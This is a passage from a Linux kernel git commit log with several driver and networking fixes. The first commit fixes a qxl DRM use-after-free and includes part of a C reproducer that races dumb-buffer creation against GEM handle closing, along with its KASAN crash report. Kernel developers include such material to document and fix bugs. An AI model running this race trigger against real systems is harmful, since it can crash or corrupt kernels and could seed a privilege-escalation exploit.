		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
		exit(-1);
	}
	gem_close(arg.handle);
	while(1) {
		struct drm_mode_create_dumb args = {0};
		args.width = args.height = 0x20;
		args.bpp = 32;
		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
		if (ret) {
			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
			exit(-1);
		}

		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
		gem_close(args.handle);
	}
	return NULL;
}

void gem_close(int handle)
{
	struct drm_gem_close args;
	args.handle = handle;
	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
	if (!ret)
		printf("gem close handle %d\n", args.handle);
}

int main(void)
{
	dri_fd= open("/dev/dri/card0", O_RDWR);
	printf("fd:%d\n", dri_fd);

	if(dri_fd == -1)
		return -1;

	pthread_t tid1;

	if(pthread_create(&tid1,NULL,trigger,NULL)){
		perror("[*] thread_create tid1\n");
		return -1;
	}
	while (1)
	{
		gem_close(arg.handle);
	}
	return 0;
}

This is a KASAN report:

==================================================================
BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
Write of size 1 at addr ffff88801136c240 by task poc/515

CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
Call Trace:
<TASK>
__dump_stack linux/lib/dump_stack.c:88
dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
print_address_description linux/mm/kasan/report.c:319
print_report+0xd2/0x660 linux/mm/kasan/report.c:430
kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
__asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
RIP: 0033:0x7ff5004ff5f7
Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48

RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
</TASK>

Allocated by task 515:
kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
____kasan_kmalloc linux/mm/kasan/common.c:374
__kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
kasan_kmalloc linux/./include/linux/kasan.h:196
kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
kmalloc linux/./include/linux/slab.h:580
kzalloc linux/./include/linux/slab.h:720
qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120

Freed by task 515:
kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
____kasan_slab_free linux/mm/kasan/common.c:236
____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
__kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
kasan_slab_free linux/./include/linux/kasan.h:162
slab_free_hook linux/mm/slub.c:1781
slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
slab_free linux/mm/slub.c:3787
__kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
kfree+0x78/0x120 linux/mm/slab_common.c:1019
qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
kref_put linux/./include/linux/kref.h:65
ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
kref_put linux/./include/linux/kref.h:65
__drm_gem_object_put linux/./include/drm/drm_gem.h:431
drm_gem_object_put linux/./include/drm/drm_gem.h:444
qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120

The buggy address belongs to the object at ffff88801136c000
which belongs to the cache kmalloc-1k of size 1024
The buggy address is located 576 bytes inside of
freed 1024-byte region [ffff88801136c000, ffff88801136c400)

The buggy address belongs to the physical page:
page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
Disabling lock debugging due to kernel taint

Instead of returning a weak reference to the qxl_bo object, return the
created drm_gem_object and let the caller decrement the reference count
when it no longer needs it. As a convenience, if the caller is not
interested in the gobj object, it can pass NULL to the parameter and the
reference counting is descremented internally.

The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).

Link: https://www.zerodayinitiative.com/
Signed-off-by: Wander Lairson Costa <wander@redhat.com>
Cc: stable@vger.kernel.org
Reviewed-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
2023-08-18 06:57:38 +10:00
Dave Airlie
68c60b3433 amd-drm-fixes-6.5-2023-08-16:
amdgpu:
 - SMU 13.x fixes
 - Fix mcbp parameter for gfx9
 - SMU 11.x fixes
 - Temporary fix for large numbers of XCP partitions
 - S0ix fixes
 - DCN 2.0 fix
 -----BEGIN PGP SIGNATURE-----
 
 iHUEABYKAB0WIQQgO5Idg2tXNTSZAr293/aFa7yZ2AUCZN0pwAAKCRC93/aFa7yZ
 2Pm5AQCWBRQ8olFSd6w+hfuXu3E/m/nIalEMb2CAyUtvUeSJYQEAhh0FpkpcOBKG
 /Ya8fMz5R/FIHvzoHHga0V2ceEt67wg=
 =Alen
 -----END PGP SIGNATURE-----

Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes

amd-drm-fixes-6.5-2023-08-16:

amdgpu:
- SMU 13.x fixes
- Fix mcbp parameter for gfx9
- SMU 11.x fixes
- Temporary fix for large numbers of XCP partitions
- S0ix fixes
- DCN 2.0 fix

Signed-off-by: Dave Airlie <airlied@redhat.com>

From: Alex Deucher <alexander.deucher@amd.com>
Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
2023-08-18 06:09:27 +10:00
Dave Airlie
be48306f76 One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for
 the qaic accel, a use-after-free fix for nouveau and a revert for an
 alleged fix in EDID parsing.
 -----BEGIN PGP SIGNATURE-----
 
 iHUEABYKAB0WIQRcEzekXsqa64kGDp7j7w1vZxhRxQUCZN4izwAKCRDj7w1vZxhR
 xRxGAP4h+R+qhB1X4SVmCB8DEY109lcHJofNK/z7aW8EG8X4sQEAlb1cOZRtmRjS
 9/Wdmc7377soNHNlMNhxEg8kEeqxGwE=
 =c6Zn
 -----END PGP SIGNATURE-----

Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes

One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for
the qaic accel, a use-after-free fix for nouveau and a revert for an
alleged fix in EDID parsing.

Signed-off-by: Dave Airlie <airlied@redhat.com>

From: Maxime Ripard <mripard@redhat.com>
Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq
2023-08-18 06:08:58 +10:00
Dave Airlie
dd64d8ae0f - Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay)
- Fix SDVO panel_type initialization (Jani)
 - Fix display probe for IVB Q and IVB D GT2 server (Jani)
 -----BEGIN PGP SIGNATURE-----
 
 iQEzBAABCAAdFiEEbSBwaO7dZQkcLOKj+mJfZA7rE8oFAmTeMewACgkQ+mJfZA7r
 E8qILgf/cvNbXxfp0D0oqpMOQxj9b0yBZ1IFNwXtyDBRHpfZaSYOgkxhh0ybcGei
 p15AOwk96hET5wo2KmBsq6JakjBU7GNfRtFISOQBPevo4pFPSKO/XZTOFzp7Wb2M
 eqDI9EVaedGRqV+oEiRfr1XpCPunIDg7jaCC1Fl/aD+iX93GO1ExuiPgHJNdIA36
 KfqVF9bgDupt9foCzPktJpwglG1xIOXCphXUogZ+15FtIfvgFvPhIGnDBVoTH9av
 A1kr8d114K+VPT1YqfdrgNHMw4doHcejcnNxESn0kXI2KptCKhgBHAr/93ytMz9r
 mix3VDSvBIWLtj18ca61BbtLKL7org==
 =Bx6T
 -----END PGP SIGNATURE-----

Merge tag 'drm-intel-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-intel into drm-fixes

- Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay)
- Fix SDVO panel_type initialization (Jani)
- Fix display probe for IVB Q and IVB D GT2 server (Jani)

Signed-off-by: Dave Airlie <airlied@redhat.com>

From: Rodrigo Vivi <rodrigo.vivi@intel.com>
Link: https://patchwork.freedesktop.org/patch/msgid/ZN4yduyBU1Ev9dc7@intel.com
2023-08-18 06:08:43 +10:00
Jakub Kicinski
e9bbd60169 mlx5-fixes-2023-08-16
-----BEGIN PGP SIGNATURE-----
 
 iQEzBAABCAAdFiEEGhZs6bAKwk/OTgTpSD+KveBX+j4FAmTdNAEACgkQSD+KveBX
 +j76qQf+PO4Po2ihQifANqZdJ75PumJxvHw3GUtroq0ELt2CqUx4cFwnVVoy2+6Y
 fYctk0UpFu5yRHkPUv5jVgP8ixDgLiJ8wLR15evCi3iDKxi0Ta/e+8EsTfKBrtI4
 GXK7wYTL+awZz5QDyerkMjqDSDDJ8KBgL4p2B1jpKgPMvd5gYWxqG+6MC5b/AAFe
 jqZAB6vocCYH6TGRBn7Gn2b6jnWhG35HBViv+nUCjZKRpVrkNq4wbh9RfeAgOaqz
 8rEBII19EnbaBj+RpJrLNgSINmv5TQCd4PY0CLkhqFYtJw6nlYEYcuMkdfi8VUO8
 P2UNhznOnCtJqai0Unsz2tR6H20uzQ==
 =BUoK
 -----END PGP SIGNATURE-----

Merge tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux

Saeed Mahameed says:

====================
mlx5 fixes 2023-08-16

This series provides bug fixes to mlx5 driver.

* tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux:
  net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
  net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
====================

Link: https://lore.kernel.org/r/20230816204108.53819-1-saeed@kernel.org
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:56:44 -07:00
Marcin Szycik
43d00e102d ice: Block switchdev mode when ADQ is active and vice versa
ADQ and switchdev are not supported simultaneously. Enabling both at the
same time can result in nullptr dereference.

To prevent this, check if ADQ is active when changing devlink mode to
switchdev mode, and check if switchdev is active when enabling ADQ.

Fixes: fbc7b27af0 ("ice: enable ndo_setup_tc support for mqprio_qdisc")
Signed-off-by: Marcin Szycik <marcin.szycik@linux.intel.com>
Reviewed-by: Przemek Kitszel <przemyslaw.kitszel@intel.com>
Tested-by: Sujai Buvaneswaran <sujai.buvaneswaran@intel.com>
Signed-off-by: Tony Nguyen <anthony.l.nguyen@intel.com>
Reviewed-by: Simon Horman <horms@kernel.org>
Link: https://lore.kernel.org/r/20230816193405.1307580-1-anthony.l.nguyen@intel.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:55:40 -07:00
Manish Chopra
2eb9625a3a qede: fix firmware halt over suspend and resume
While performing certain power-off sequences, PCI drivers are
called to suspend and resume their underlying devices through
PCI PM (power management) interface. However this NIC hardware
does not support PCI PM suspend/resume operations so system wide
suspend/resume leads to bad MFW (management firmware) state which
causes various follow-up errors in driver when communicating with
the device/firmware afterwards.

To fix this driver implements PCI PM suspend handler to indicate
unsupported operation to the PCI subsystem explicitly, thus avoiding
system to go into suspended/standby mode.

Without this fix device/firmware does not recover unless system
is power cycled.

Fixes: 2950219d87 ("qede: Add basic network device support")
Signed-off-by: Manish Chopra <manishc@marvell.com>
Signed-off-by: Alok Prasad <palok@marvell.com>
Reviewed-by: John Meneghini <jmeneghi@redhat.com>
Reviewed-by: Simon Horman <horms@kernel.org>
Link: https://lore.kernel.org/r/20230816150711.59035-1-manishc@marvell.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:55:39 -07:00
Eric Dumazet
b616be6b97 net: do not allow gso_size to be set to GSO_BY_FRAGS
One missing check in virtio_net_hdr_to_skb() allowed
syzbot to crash kernels again [1]

Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff),
because this magic value is used by the kernel.

[1]
general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500
Code: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01
RSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202
RAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000
RDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070
RBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff
R10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6
R13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff
FS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109
ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120
skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53
__skb_gso_segment+0x339/0x710 net/core/gso.c:124
skb_gso_segment include/net/gso.h:83 [inline]
validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625
__dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329
dev_queue_xmit include/linux/netdevice.h:3082 [inline]
packet_xmit+0x257/0x380 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3087 [inline]
packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119
sock_sendmsg_nosec net/socket.c:727 [inline]
sock_sendmsg+0xd9/0x180 net/socket.c:750
____sys_sendmsg+0x6ac/0x940 net/socket.c:2496
___sys_sendmsg+0x135/0x1d0 net/socket.c:2550
__sys_sendmsg+0x117/0x1e0 net/socket.c:2579
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
RIP: 0033:0x7ff27cdb34d9

Fixes: 3953c46c3a ("sk_buff: allow segmenting based on frag sizes")
Reported-by: syzbot <syzkaller@googlegroups.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Xin Long <lucien.xin@gmail.com>
Cc: "Michael S. Tsirkin" <mst@redhat.com>
Cc: Jason Wang <jasowang@redhat.com>
Reviewed-by: Willem de Bruijn <willemb@google.com>
Reviewed-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xuan Zhuo <xuanzhuo@linux.alibaba.com>
Link: https://lore.kernel.org/r/20230816142158.1779798-1-edumazet@google.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:53:40 -07:00
Abel Wu
2d0c88e84e sock: Fix misuse of sk_under_memory_pressure()
The status of global socket memory pressure is updated when:

  a) __sk_mem_raise_allocated():

	enter: sk_memory_allocated(sk) >  sysctl_mem[1]
	leave: sk_memory_allocated(sk) <= sysctl_mem[0]

  b) __sk_mem_reduce_allocated():

	leave: sk_under_memory_pressure(sk) &&
		sk_memory_allocated(sk) < sysctl_mem[0]

So the conditions of leaving global pressure are inconstant, which
may lead to the situation that one pressured net-memcg prevents the
global pressure from being cleared when there is indeed no global
pressure, thus the global constrains are still in effect unexpectedly
on the other sockets.

This patch fixes this by ignoring the net-memcg's pressure when
deciding whether should leave global memory pressure.

Fixes: e1aab161e0 ("socket: initial cgroup code.")
Signed-off-by: Abel Wu <wuyun.abel@bytedance.com>
Acked-by: Shakeel Butt <shakeelb@google.com>
Link: https://lore.kernel.org/r/20230816091226.1542-1-wuyun.abel@bytedance.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:34:36 -07:00
Edward Cree
54c9016eb8 sfc: don't fail probe if MAE/TC setup fails
Existing comment in the source explains why we don't want efx_init_tc()
 failure to be fatal.  Cited commit erroneously consolidated failure
 paths causing the probe to be failed in this case.

Fixes: 7e056e2360 ("sfc: obtain device mac address based on firmware handle for ef100")
Reviewed-by: Martin Habets <habetsm.xilinx@gmail.com>
Signed-off-by: Edward Cree <ecree.xilinx@gmail.com>
Link: https://lore.kernel.org/r/aa7f589dd6028bd1ad49f0a85f37ab33c09b2b45.1692114888.git.ecree.xilinx@gmail.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:31:07 -07:00
Edward Cree
fa165e1949 sfc: don't unregister flow_indr if it was never registered
In efx_init_tc(), move the setting of efx->tc->up after the
 flow_indr_dev_register() call, so that if it fails, efx_fini_tc()
 won't call flow_indr_dev_unregister().

Fixes: 5b2e12d51b ("sfc: bind indirect blocks for TC offload on EF100")
Suggested-by: Pieter Jansen van Vuuren <pieter.jansen-van-vuuren@amd.com>
Reviewed-by: Martin Habets <habetsm.xilinx@gmail.com>
Signed-off-by: Edward Cree <ecree.xilinx@gmail.com>
Link: https://lore.kernel.org/r/a81284d7013aba74005277bd81104e4cfbea3f6f.1692114888.git.ecree.xilinx@gmail.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 11:31:07 -07:00
Mark Brown
2f43f549cd arm64/ptrace: Ensure that the task sees ZT writes on first use
When the value of ZT is set via ptrace we don't disable traps for SME.
This means that when a the task has never used SME before then the value
set via ptrace will never be seen by the target task since it will
trigger a SME access trap which will flush the register state.

Disable SME traps when setting ZT, this means we also need to allocate
storage for SVE if it is not already allocated, for the benefit of
streaming SVE.

Fixes: f90b529bcb ("arm64/sme: Implement ZT0 ptrace support")
Signed-off-by: Mark Brown <broonie@kernel.org>
Cc: <stable@vger.kernel.org> # 6.3.x
Link: https://lore.kernel.org/r/20230816-arm64-zt-ptrace-first-use-v2-1-00aa82847e28@kernel.org
Signed-off-by: Catalin Marinas <catalin.marinas@arm.com>
2023-08-17 19:00:03 +01:00
Mark Brown
5d0a8d2fba arm64/ptrace: Ensure that SME is set up for target when writing SSVE state
When we use NT_ARM_SSVE to either enable streaming mode or change the
vector length for a process we do not currently do anything to ensure that
there is storage allocated for the SME specific register state.  If the
task had not previously used SME or we changed the vector length then
the task will not have had TIF_SME set or backing storage for ZA/ZT
allocated, resulting in inconsistent register sizes when saving state
and spurious traps which flush the newly set register state.

We should set TIF_SME to disable traps and ensure that storage is
allocated for ZA and ZT if it is not already allocated.  This requires
modifying sme_alloc() to make the flush of any existing register state
optional so we don't disturb existing state for ZA and ZT.

Fixes: e12310a0d3 ("arm64/sme: Implement ptrace support for streaming mode SVE registers")
Reported-by: David Spickett <David.Spickett@arm.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Cc: <stable@vger.kernel.org> # 5.19.x
Link: https://lore.kernel.org/r/20230810-arm64-fix-ptrace-race-v1-1-a5361fad2bd6@kernel.org
Signed-off-by: Catalin Marinas <catalin.marinas@arm.com>
2023-08-17 18:59:51 +01:00
Zheng Yejian
eecb91b9f9 tracing: Fix memleak due to race between current_tracer and trace
Kmemleak report a leak in graph_trace_open():

  unreferenced object 0xffff0040b95f4a00 (size 128):
    comm "cat", pid 204981, jiffies 4301155872 (age 99771.964s)
    hex dump (first 32 bytes):
      e0 05 e7 b4 ab 7d 00 00 0b 00 01 00 00 00 00 00 .....}..........
      f4 00 01 10 00 a0 ff ff 00 00 00 00 65 00 10 00 ............e...
    backtrace:
      [<000000005db27c8b>] kmem_cache_alloc_trace+0x348/0x5f0
      [<000000007df90faa>] graph_trace_open+0xb0/0x344
      [<00000000737524cd>] __tracing_open+0x450/0xb10
      [<0000000098043327>] tracing_open+0x1a0/0x2a0
      [<00000000291c3876>] do_dentry_open+0x3c0/0xdc0
      [<000000004015bcd6>] vfs_open+0x98/0xd0
      [<000000002b5f60c9>] do_open+0x520/0x8d0
      [<00000000376c7820>] path_openat+0x1c0/0x3e0
      [<00000000336a54b5>] do_filp_open+0x14c/0x324
      [<000000002802df13>] do_sys_openat2+0x2c4/0x530
      [<0000000094eea458>] __arm64_sys_openat+0x130/0x1c4
      [<00000000a71d7881>] el0_svc_common.constprop.0+0xfc/0x394
      [<00000000313647bf>] do_el0_svc+0xac/0xec
      [<000000002ef1c651>] el0_svc+0x20/0x30
      [<000000002fd4692a>] el0_sync_handler+0xb0/0xb4
      [<000000000c309c35>] el0_sync+0x160/0x180

The root cause is descripted as follows:

  __tracing_open() {  // 1. File 'trace' is being opened;
    ...
    *iter->trace = *tr->current_trace;  // 2. Tracer 'function_graph' is
                                        //    currently set;
    ...
    iter->trace->open(iter);  // 3. Call graph_trace_open() here,
                              //    and memory are allocated in it;
    ...
  }

  s_start() {  // 4. The opened file is being read;
    ...
    *iter->trace = *tr->current_trace;  // 5. If tracer is switched to
                                        //    'nop' or others, then memory
                                        //    in step 3 are leaked!!!
    ...
  }

To fix it, in s_start(), close tracer before switching then reopen the
new tracer after switching. And some tracers like 'wakeup' may not update
'iter->private' in some cases when reopen, then it should be cleared
to avoid being mistakenly closed again.

Link: https://lore.kernel.org/linux-trace-kernel/20230817125539.1646321-1-zhengyejian1@huawei.com

Fixes: d7350c3f45 ("tracing/core: make the read callbacks reentrants")
Signed-off-by: Zheng Yejian <zhengyejian1@huawei.com>
Signed-off-by: Steven Rostedt (Google) <rostedt@goodmis.org>
2023-08-17 13:49:37 -04:00
Mark Brown
ab0b5072d1
ASoC: cs35l56: Update ACPI HID and property
Merge series from Richard Fitzgerald <rf@opensource.cirrus.com>:

These two patches add an ACPI HID and update the way the platform-
specific firmware identifier is extracted from the ACPI.
2023-08-17 18:36:28 +01:00
Linus Torvalds
16931859a6 nfsd-6.5 fixes:
- Fix new MSG_SPLICE_PAGES support in server's TCP sendmsg helper
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCAAdFiEEKLLlsBKG3yQ88j7+M2qzM29mf5cFAmTeKW4ACgkQM2qzM29m
 f5dqfRAAjLXcxSixOnFqp49echmMlG1DI493WbiXG05hJ43TspnoThIGI+GpeTBG
 LxADUeZuxbMor0In8qA/GzRGQjJpdL22E1EWfLUlFN7JtWjVyyeuYLSeECGskByP
 VxAiQ/uo50dYPcRI3YN391ec2GZ9wnrNkHbfj3X0pEZoZVDea3GPRXnUQbnb4GVS
 Xj433F1pmPfl7EFNWCSuMcb3OPjG1uzcbYWF6+1RjaLZ02QrgzvwmU4bMePGHRga
 PsFGBaBdVJi6Dkv41NhsAflsg6DjZnzyuHnH8N6EygMz4py3kess9TRux1J9g22f
 j+o/GM+U1r66YXdhMhg1kiYApemRCybrmzFgn0B9dtYC7r4MiHVVRQFgAoa95teo
 g4iDQ/jxJOJMFm8ipXM/bOgMcznJfcHBX2pG2cN+qXZyPQnCn+luh81JI2s5pvqf
 yAJ/uThL6cWdyLoM+ZBvozpfPn9QTwwqDWMtZlbVkIz/nM6kiJjdUrl2NDBpaDhq
 WGd3CP6GWgxoCbURpfBJPLytjhb00Bep7xRm6BZavt/XSOHRWJdhEachVyWt/zFI
 6zLOMHv9A7rPTBigFAIgdfZzIL9c+StdpW3oEafWovwTBKW537W+m680tdLQK44q
 yl2EmeG2Z3hpqbRnDPiV5XCJ7ijArFslBBuZB6mwDCPKcbMs3FQ=
 =jfUp
 -----END PGP SIGNATURE-----

Merge tag 'nfsd-6.5-4' of git://git.kernel.org/pub/scm/linux/kernel/git/cel/linux

Pull nfsd fix from Chuck Lever:

 - Fix new MSG_SPLICE_PAGES support in server's TCP sendmsg helper

* tag 'nfsd-6.5-4' of git://git.kernel.org/pub/scm/linux/kernel/git/cel/linux:
  sunrpc: set the bv_offset of first bvec in svc_tcp_sendmsg
2023-08-17 16:38:48 +02:00